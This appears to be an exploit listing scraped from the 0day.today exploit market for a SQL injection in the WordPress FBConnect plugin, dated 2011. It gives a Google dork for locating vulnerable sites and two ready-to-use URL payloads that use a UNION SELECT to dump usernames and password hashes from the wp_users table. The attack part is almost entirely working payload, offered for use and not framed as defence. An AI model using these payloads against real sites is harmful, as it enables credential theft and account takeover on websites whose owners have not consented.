[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress plugin FBConnect SQL-Inj

Author
cyber-punk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17202
Category
web applications
Date add
03-10-2011
Platform
php
# Exploit Title: Wordpress plugin FBConnect SQL-Inj
# Google Dork: inurl:"fbconnect_action=myhome"
# Date: 03.04.2011
# Author: cyber-punk
# Software Link: http://wordpress.org/
# Version: all, if plugin is on

http://wordpress-site/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--

or

http://wp-site/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--



#  0day.today [2024-11-15]  #